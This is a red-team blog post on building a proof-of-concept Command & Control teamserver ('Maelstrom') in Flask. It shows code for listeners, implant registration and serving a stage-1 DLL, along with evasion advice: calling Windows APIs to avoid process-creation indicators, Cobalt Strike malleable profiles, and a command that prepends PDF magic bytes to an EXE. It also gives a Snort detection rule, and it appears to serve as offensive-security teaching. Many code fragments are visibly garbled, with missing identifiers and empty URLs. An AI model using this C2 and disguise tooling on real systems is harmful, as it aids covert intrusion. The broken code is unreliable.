Maelstrom #3: Building the Team Server

In this post we are discussing building a C2 Teamserver, common pitfalls, and the difficulty of identifying singular malicious requests.


In the previous post, Maelstrom: The C2 Architecture, we discussed the general architecture for a Command & Control Framework, including connections from the implant to the server and the execution flow of the implant it'self. This post will continue this architecture discussion, this time looking at the further C2 development considerations around the user interface and experience. We'll also (lightly!) look at how designing and protecting the C2's communication channels.


This post will cover:
  • choosing a user interface from command line, thick / thin clients, and browser-based UIs.
  • choosing a language for the backend to manage the implants (and the interface)
  • deciding which actions the C2 will handle for the user, including:
  • listener initialisation
  • payload generation
  • communications security
  • the choices we made for Maelstrom
As we've mentioned previously, most of the discussions we're going to have in this series will focus on the offensive and defensive actions to take on the C2 implant. However, we still felt it would be worth looking at the points listed above because they are relevant to the implant's behaviour and security. We won't (in this post at any rate) look too much at redirectors, channels, and other parts of the red team infrastructure.

Important Concepts

Our preferred way of handling C2 communications is by using a simple API. HTTP exists in almost every client environment, and where it doesn't, traffic can be handled by intermediary devices (such as the aforementioned redirectors and channels which are so interesting that we won't discuss them here).
Our earlier choice to use an object oriented approach was partially informed by this decision, as the way we modelled the implant helped inform the structure our API should use. By using an OOP approach within the server as well, we found that the API architecture largely wrote it'self. Ensuring that the API is written in a logical and predictable fashion makes future changes and additions so much simpler than having to un-spaghetti your spaghetti.
There are infinite ways to interact with a computer program, depending on how pedantic you feel like being. When it comes to C2's, there are three broad camps:
  • CLI (such as with Posh and Sliver)
  • Browser based GUI (such as with Covenant and Mythic)
  • Client base GUI (such as with Nighthawk, Brute Ratel C4, Havoc, and Cobalt Strike)
These are broad camps, and it's worth stating that a C2 can absolutely have both a command line interface and a graphical interface. Several C2s also support "virtual" CLI interfaces where a browser based GUI mimics or passes through a CLI.
These user interfaces are not necessarily tightly-bound to the server it'self. C2's, especially corporate C2s or those intended to be part of a wider red team infrastructure, will often come with a separate way to interact with a central "team server". A good example of this is Cobalt Strike, where the main team server is remotely accessed by a client on the operator's local machine.

Design Matters

This may seem all somewhat whimsical to discuss, but the design of the interface is important. It's the only way that the operators will be able to interact with the C2, and what is shown and not shown will influence it's effectiveness. If the only way to properly secure traffic and implants is buried within submenus, while a quick and lazy option exists, an operator will use the quick and easy option. Even in situations where the default choice is a good one, heavy overreliance on a single technique can it'self become an indicator of compromise or a fingerprint (such as the PowerShell persistence used by APT28).
With a clear design and a usable UI, opsec becomes more than just muscle memory and runes.

Choosing a frontend

The C2 Matrix has an Ask The C2 Matrix function which allows for users to filter on all sorts of C2 component, with UI being one of them. As we've previously mentioned, there are three broad camps: CLI, Web GUI, and Client GUI.
Lets look at some examples of contempory C2s which implement the different options, and some libraries which could help you achieve a similar experience:


Libraries worth a look
Web Application
Libraries worth a look
Libraries worth a look

Choosing a backend

In a real world scenario, the server software should be tested for it's ability to handle requests in a timely fashion. For example, ThePrimeagen did a video called Go is faster than Rust??! Go vs Rust vs TypeScript Servers (as a scientist) which tested the loads between Go, Rust, and TypeScript. We would recommend a similar test for the teamserver.
For example, at around 5:34, Primeagen discusses the experiment in which 4 Linode machines make 800 connections each to a Golang and Rust Server. Each connection plays a game and measures how many active games were played:
Golang was able to handle the loads extremely well, whilst being easy to develop. Rust on the other hand, was up and down whilst being a lot more difficult to actually write. Albeit this server was not a malware-oriented team-server, but the data is something to consider.
With that said, we are going to work with Flask/Python, purely out of ease for this demonstration.
One final note here before we move on to code - outside of what we're discussing, this code is deliberately dependent on insecure behaviours. Maelstrom is just for demonstration purposes. Some of these red herrings will become obvious throughout the next few blog posts.

Quick talk on Protocols

When it comes to commmuncation, there are a multitude of protocols that should be considered.


First off, Hypertext Transfer Protocol (HTTP). HTTP is kind of perfect for C2 communications because data can be embedded in a the request in. This is something that most, if not all, C2s will support. Below are some locations in the request where data can be embedded:
  • Uris
  • Headers
  • Body
Lets take a look at an example:
GET /endpoint/form HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Content-Type: application/x-www-form-urlencoded
Content-Length: length
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
In this example from tutorialspoint, a form has been filled and posted to the server. If this was being used to mask C2 communication, an extra parameter could be added to the body:
As well as transferring C2 data effectively, its also great for obfuscating the location of the server with techniques such as Domain Fronting. Although, this is getting more difficult. This spawns projects such as C3. We'll look at masking traffic further in later blogs.
To be honest, explaining HTTP specifically for C2 communication could be an entire blog in-of-itself. So we will leave HTTP here. But, this is the communication we will be using for our proof-of-concept.


Domain Name System (DNS) is another method that people tend to use for C2 communcations.
This is something that Cobalt Strike natively supports which is explained like so:
Today, the DNS Beacon can download tasks over DNS TXT records, DNS AAAA records, or DNS A records. This payload has the flexibility to change between these data channels while its on target. Use Beacon’s mode command to change the current Beacon’s data channel. mode dns is the DNS A record data channel. mode dns6 is the DNS AAAA record channel. And, mode dns-txt is the DNS TXT record data channel. The default is the DNS TXT record data channel.
The only issue with this is that its substantially slower than HTTP but provides better protections as these channels are less inspected than HTTP.


Server Message Block (SMB) is another protocol used for C2 communications. However, its not used for the traditional data transfer. This is typically used for peer-to-peer, or implant-to-implant. In order for this to work, one of the beacons needs to operate as a "server" which communicates out across HTTP/DNS to the teamserver. This allows subsequent implants to communicate with the implant in server-mode. This is particularly useful for getting around secure networks with limited ingress/egress as well as daisy chaining implants together for less outbound traffic.
Similarly to DNS, this is something we arent implementing but we recommended this protocol to be implemented, whereas DNS is somewhat optional and dependant on the usecase for the end-user.

Introducing Maelstrom

Maelstrom is quick and easy, and we don't need to consider the user experience since it'll be us, and briefly at that. So to make our lives easier, we'll show our workings with Flask, python-prompt-toolkit and Python 3.9. The advantage of Python is that, provided you can work out how to get Windows to stop installing python from the Store, it's platform agnostic and quick to develop in. Given that python is basically executable pseudo-code this should also help illustrate our points.
Now that we have overloaded you with options, let's look into how Maelstrom is going to work.


First up, the server. This is the component that the implant will respond to. So, when is run in the terminal, the following is printed:
usage: Maelstrom [-h] {server,payload} ...
positional arguments:
{server,payload} Start Server | Generate Payloads
server Start the Maelstrom Server
payload Generate a Maelstrom Payload
optional arguments:
-h, --help show this help message and exit
- Run Server:
python3 server
- Generate Payload:
python3 payload
There are two options:
  • Run the server
  • Generate a payload
However, we are only implementing the server:
def main() -> None:
args = Args.get_args()
if args.which == 'server':
if __name__ == "__main__":
Lets step through run_maelstrom()...
The very first thing it does is get the available commands:
commands: dict = get_commands()
Where get_commands() is:
def get_commands() -> dict:
"""convert the list of commands into the complete data structure"""
cs: dict = {}
commands: list = available_commands()
for command in commands:
cs[] = command.sub_args
return cs
This function parses the return of available_commands and builds out a dictionary of the required info.
In Maelstrom these commands are somewhat hardcoded, limiting it's extensibility:
def available_commands() -> list:
"""Store all the commands and return as a list of dataclasses"""
exit_cmd: Command = Command(
'Exit Maelstrom','Exit Maelstrom',
help_cmd: Command = Command(
'Show all the available commands',
'Show all the available commands',
set_cmd: Command = Command(
'Start a new listener',
'Start a new listener by specifying a host, port, uri, and password',
show_cmd: Command = Command(
'Show listeners|implants',
'Show listeners|implants',
"listeners": None,
"implants": None
# return all command dataclasses as a list
return [exit_cmd, help_cmd, set_cmd, show_cmd]
Note the Command object, it is a dataclass:
from dataclasses import dataclass, field
class Command:
"""Dataclass to hold the command info"""
# command name
name: str
# command description (long)
long_desc: str
# command description (short)
short_desc: str
# sub arguments
sub_args: dict
# allow it to be sorted on size
def __post__init(self):
self.sort_index = self.size
This method does not provide any flexibility. In the case of Vulpes, the Factory Design Pattern is used. This enables the server to pragmatically identify the commands, the info required, pre/post actions and so on. The reason we are pointing this out is because to make a C2 useful, it needs to be extendable. Maelstrom does not support that.
So, get_commands() again:
def get_commands() -> dict:
"""convert the list of commands into the complete data structure"""
cs: dict = {}
commands: list = available_commands()
for command in commands:
cs[] = command.sub_args
return cs
The reason it rebuilds the dictionary in this way is because Maelstrom makes use of Prompt Toolkit and the commands then auto-populate the Nested Dictionary information.
Running the server and typing help shows this:
These match up to the dataclasses seen earlier:
exit_cmd: Command = Command(
'Exit Maelstrom','Exit Maelstrom',
help_cmd: Command = Command(
'Show all the available commands',
'Show all the available commands',
set_cmd: Command = Command(
'Start a new listener',
'Start a new listener by specifying a host, port, uri, and password',
show_cmd: Command = Command(
'Show listeners|implants',
'Show listeners|implants',
"listeners": None,
"implants": None
Because this is a lazy implementation of the server, the next thing to happen is a big while loop which gives a prompt and parses commands:
# bool used to control the while loop
execute: bool = True
# username to print
username: str = getpass.getuser()
# run until told otherwise
while execute:
# get the user input
user_input: str = prompt(f'[{username}]> ', completer=completer)
# if nothing is passed, just continue
if not user_input: continue
# Exit
if user_input.startswith('exit'):
execute = False
# Help
elif user_input.startswith('help'):
# Listener
elif user_input.startswith('listener'):
elif user_input.startswith('show'):
The ONLY functionality maelstrom provides is the ability to create listeners and show connected implants. However, lets discuss post-exploitation briefly (we discuss this much later on in the series in a bit more depth).
For the sake of the discussion, our example command will be whoami. If you were to go onto the C2 Matrix, and pick a C2 that isn't .NET, you'd have a 90% chance of getting this:
cmd.exe /c whoami
Which will subsequently produce the following process tree:
-> implant.exe
-> cmd.exe
-> whoami.exe
Meaning every time this is ran, it spawns to processes and produces T1059/003: Command and Scripting Interpreter: Windows Command Shell. Doing so would either require the code to use system() or CreateProcessA() with cmd.exe as the target, and /c whoami as the argument. Overall, producing a bunch of IOCs for such a simple command. When in reality, whoami only calls GetUserNameA:
BOOL GetUserNameA(
[out] LPSTR lpBuffer,
[in, out] LPDWORD pcbBuffer
So.. why not use it:
CHAR lpUserName[MAX_PATH];
if (!GetUserNameA(lpUserName, &nSize))
return NULL;
Moreover, the first thing 99% of people do when they receive an implant is an instinctive ls or whoami. By reimplementing commands, the potential IOCs are drastically reduced. This narrative spawned projects like CS-Situational-Awareness-BOF, CS-Remote-OPs-BOF, and C2-Tool-Collection.
Want to know the hostname? then GetComputerNameA(). Want to get the current process directory? Get it from the PEB:
std::string GetProcessCurrentDirectory() {
UNICODE_STRING us = processParams->CurrentDirectoryPath;
std::wstring ws(us.Buffer, us.Length / 2);
std::string ss(ws.begin(), ws.end());
return ss;
These are obviously simple commands, but lets say kerberoast is an internal command. Then these things are possible to write in C, after all, Windows is written in C: c2-tool-collection/BOF/Kerberoast.
More on this in a later part. For now, listeners!


Lets take a look at how we implemented listener creation. If the user input start on the CLI starts with listener then the handle_listener() function is called:
elif user_input.startswith('listener'):
First thing that happens is that it tries to find a space to assume that the input is correct:
def handle_listener(user_input: str) -> None:
usage = 'Usage: listener <host> <port> <base uri> <password>'
if ' ' not in user_input:
If that is fine, it then split's on the space and counts the length. If it's not 5, then the command is wrong:
# split out the command
split: list = user_input.split(' ')
# make sure all the components are passed
if len(split) != 5:
Note the usage here:
usage = 'Usage: listener <host> <port> <base uri> <password>'
A valid input would be:
listener 5555 /some-uri PassWoRd1
As the first index, 0, should be the command name, it attempts to validate it:
# use the first element to get the comand object
command: Command = get_a_command(split[0])
# if it doesnt exist, return
if not command:
print('Failed to find command!')
Like so:
def get_a_command(select: str) -> Command:
"""Get a specific command"""
return[c for c in available_commands() if select ==]
The dataclass returned is never used, but it's just checked to see if the command is valid. Now that it is, the Listener dataclass can be used to pass the information into the class, like so:
listener: Listener = Listener(random_string(), split[0], split[1], split[2], split[3])
Where the dataclass is:
class Listener:
"""Dataclass to hold the listener info"""
# name
name: str
# listener address
address: str
# port
port: int
# uri
uri: str
# password
password: str
This is then appended to a global list:
# add the listener to the list
This is obviously not persistent. Realistically, this should be a database which is checked and restored if the server is restarted:
Next, the dataclass is used as an argument for a thread:
# start a thread pointing at the start_server function
thread = threading.Thread(target=start_server, args=(listener,))
thread.daemon = True
logger.good(f'Started: [{}] http://{listener.address}:{listener.port}{listener.uri} ({listener.password})')
except Exception as e:
logger.bad(f'Failed to start listener: {str(e)}')
This creates a thread on the start_server() function which registers the endpoint specified with the flask app using add_url_rule:
def start_server(listener: Listener) -> bool:
"""callback function to start a server"""
# add the uri
app.add_url_rule(listener.uri, view_func=comms)
# start the app
try:, port=listener.port, debug=False, threaded=True)
return True
return False
This completes the listener creation:
This can be validated by running:
curl -s "" -H "X-Maelstrom: password"|xxd|head
Which produces:
So, how does the implant communicate with this?


As we've said, we aren't implementing anything to make this C2 useful; therefore we are leaving this component out. But, we still want to discuss it. The help menu for Maelstrom has a positional argument meaning that actual file needs to be ran again with the payload switch. This doesnt really comply with best practices for user experience, and a better work flow would be to do it from within the C2. For example, as a Web App, it's easy. Use something like a modal, like we did in Vulpes. Or, popups like Cobalt Strike. If it's a CLI, then maybe some form of interactive prompt inside the C2 which works as a command as we showed previously.
When it comes to automating the payload generation, we found the easiest way was to progrmatically create a Makefile and copy/paste all the source code files into /tmp, execute the Makefile with something like:
if os.system(f"make -f {make_file_path} dll 2>/dev/null 1>&2") == 0:
Which will compile with MinGW-w64, then move the compiled implant and remove the temporary directory.
More on what to consider for payload generation in the next blog post.

Implant Communication

At this point in the post, we have a up and running team server which can create a listener. Now we need to look at what the endpoints actually do with incoming traffic to:
  • Determine if it's an implant
  • If it is, allow the implant to communicate
Handling HTTP Requests
Earlier in the post, we showed the listener being started as a new app, like so:, port=listener.port, debug=False, threaded=True)
In a typical Flask fashion, app is defined globally:
app = Flask(__name__)
And one function on / is created to handle all requests. We could start an endpoint for each type, but we found it easier to listen at the root, and filter down with logic. This allows us to log ALL requests, whilst meticulously filtering requests by their expected values.
The route:
@app.route('/', methods=["GET"])
def comms() -> Response:
Lets run through what happens inside this route. In the previous section, we created an endpoint on /a, so we will use that example.
First thing that happens here is that a bunch of information is pulled from the request object, things that we may or may not use:
user_agent = request.environ["HTTP_USER_AGENT"]
verb = request.environ["REQUEST_METHOD"]
uri = request.environ["RAW_URI"]
remote_addr = request.environ["REMOTE_ADDR"]
remote_port = request.environ["REMOTE_PORT"]
server_name = request.environ["SERVER_NAME"]
server_port = request.environ["SERVER_PORT"]
url = request.url
header = request.headers.get('X-Maelstrom')
Note the request.headers.get call. This is one of the hard-coded values sent between the client and server.
This information is then passed to the is_valid_listener function:
if not is_valid_listener(listeners, uri, server_name, server_port, header): return response
This just ensures that the dataclass information matches up to the request by ensuring that the URI, Server Address, Server Port, and Header are all correct:
def is_valid_listener(listeners: list, uri: str, server_name: str, server_port: str, header) -> bool:
"""ensure that the request is valid for the endpoints."""
for listener in listeners:
# The 'in' here is important. This is what allows for the rest of the uri to be valid. I.E: /a?aaaaa would work.
if listener.uri in uri and listener.address == server_name and str(listener.port) == server_port and listener.password == header:
return True
return False
This is an extremely primitive example of ensuring the request is as intended...
If it is valid, then the next chunk of code determines which type of request this is:
switch: str = ''
# if no data is passed
if len( == 0:
# check if the uri contains ?stage
if check_uri_for_stage(uri):
# if it does, set 'switch' to 'stage'
switch = 'stage'
# otherwise, see whats going on in the json
j = parse_json(
if not j: return response
if len(j.keys()) != 1: return response
switch: str = list(j.keys())[0]
In this case, it only has two options:
  • init
  • stage
In a real world example, init and stage are terrible endpoints. But this allows us to illustrate out point. This is then followed up with:
# if the switch is init:
if switch == "init":
# add the implant data to the 'db' and keep track of it
response = initialise_implant(j, request)
elif switch == "stage":
# otherwise if it's stage, return the dll
response = get_maelstrom_dll()
# uh-oh...
response = ""
# return the response
return response
If it's of type init, then initialise_implant() simply parses the info and prints a new connection, thats all:
def initialise_implant(j: dict, request) -> str:
"""Store the beacon info and return a success message"""
processname: str = j["init"]["processname"]
computername: str =j["init"]["computername"]
username: str = j["init"]["username"]
pid: int = j["init"]["dwpid"]
remote_addr = request.environ["REMOTE_ADDR"]
remote_port = request.environ["REMOTE_PORT"]
uid = random_string()
implant: Implant = Implant(uid, remote_addr, remote_port, processname, computername, username, pid)
logger.good(f"New Implant: ({uid}) {computername}\\{username} @ {remote_addr}:{remote_port}")
return "success"
except Exception as e:
logger.bad(f"Failed to add implant: {str(e)}")
return "failure"
There is poor error handling, no database tracking, nothing. Realistically, here there is a requirement for logging. No matter the request, it should be logged into a uniform format. Typically, what we found best with our projects is to use a file where each line is a JSON Object:
{"example": 0}
{"example": 1}
{"example": 2}
{"example": 3}
{"example": 4}
This is then easy to process by either:
  • Looping over every line and loading each line as a JSON Object
  • Using something like Filebeat, and then either using Logstash:
input {
beats {
port => 5044
tcp {
port => 5000
http {
port => 5043
filter {
json {
source => "message"
tag_on_failure => [ "_parsefailure", "parsefailure-critical", "parsefailure-json_codec" ]
remove_field => [ "message" ]
skip_on_invalid_json => true
output {
elasticsearch {
hosts => "elasticsearch:9200"
user => "logstash_internal"
Or a POST:
def post_to_logstash(data: dict, url: str) -> bool:
"""Post the json to the logstash url"""
response =
url, data=json.dumps(data), headers={"Content-Type": "application/json"}
return True
except Exception as e:
bad(f"Failed to post to {url}: {str(e)}")
return False
Depending on the project, we will use one of these methods.
Moving onto the staging endpoint, then a hardcoded path is returned:
def get_maelstrom_dll() -> bytes:
"""Read bytes from the DLL and return it!"""
dllpath = Path('agent/stage1/bin/maelstrom.x64.dll')
if not dllpath.exists():
logger.bad(f'{} doesn exist!')
return ""
dllbytes: bytes
with open(dllpath,'rb') as f:
dllbytes =
except Exception as e:
logger.bad(f'Failed to get {}: {str(e)}')
return ""
if dllbytes:'Sending Stage 1 ({len(dllbytes)} bytes)!')
return dllbytes
return ""
Again, this is intentional. We don't care for making this fancy, it's a proof-of-concept. In the next section, we go over some methods of masking the DLL, and this is where that logic would go. But, for Maelstrom, we just return the bytes of a hard-coded DLL Path.
From here, multiple switches could be implemented to do specific jobs like get a new task, or return information about a task ran. Each of these endpoints could be configured differently, giving flexibility within the communcation.
To recap, in this section we've shown two hard-coded endpoints, init and stage, and then filter down the requests based on expected information. To illustrate our point, we've just used X-Maelstrom as the header. But realistically this could just be genuine headers like ASPSESSIONID. All we are doing is making sure that only very specific requests can communicate with the teamserver.
Inspecting the requests
Using WireShark, lets inspect our HTTP Requests. The following filter will find any HTTP requests between the C2 and the Dev Machine:
http && ip.src_host == && ip.dst_host ==
Remember, the only thing this does is stage. There are no additional requests:
The above shows the /a?stage URI being requested, along with our poorly configured headers:
GET /a?stage HTTP/1.1
Connection: Keep-Alive
User-Agent: Maelstrom
X-Maelstrom: password
And as this is a stage, if we follow it in TCP Stream...
Using Snort as an example, we can match that header and immediately identify Maelstrom with the following rule:
alert tcp any any -> any 5555 (content:"X-Maelstrom"; msg:"Maelstrom Header Detected!"; sid:10000100; rev:005;)
Which looks something like this:
There are tons of improvements that could be made here, and it could get complicated very quickly with all sorts of masquerading and cryptography. However, it doesn't need to be that complicated (some people may need it to be, though). As long as the HTTP Requests are fully customizable by the end-user, then the request can be crafted however it needs to be. For those complicated engagements with every log being ingested, then cool, the request can be worked to fix that. Don't need anything? Cool, then just request /stage.
This is one thing Cobalt Strike does do well with their Malleable Command and Control, specifically the HTTP Staging where requests can be configured however:
client {
parameter "id" "1234";
header "Cookie" "SomeValue";
What is particularly good is their chained data manipulation:
server {
header "Content-Type" "image/gif";
output {
prepend "GIF89a";
In the above the GIF89a type is used which uses the magic bytes of a GIF and adds it to the end. Alternatively, this could be done by appending PNG magic bytes.
An example implementation with a PDF, assume the following data as the magic bytes for a PDF:
Converting it to bytes on CyberChef:
Then, with the following command, prepend those bytes to an EXE:
echo -n -e '\x25\x50\x44\x46\x2d\x31\x2e\x34' | /usr/bin/cat - maelstrom.unsafe.x64.exe > maelstrom.unsafe.pdf.exe
Finally, running file on both:
Now all that needs to happen is the first 8 bytes are removed from the buffer...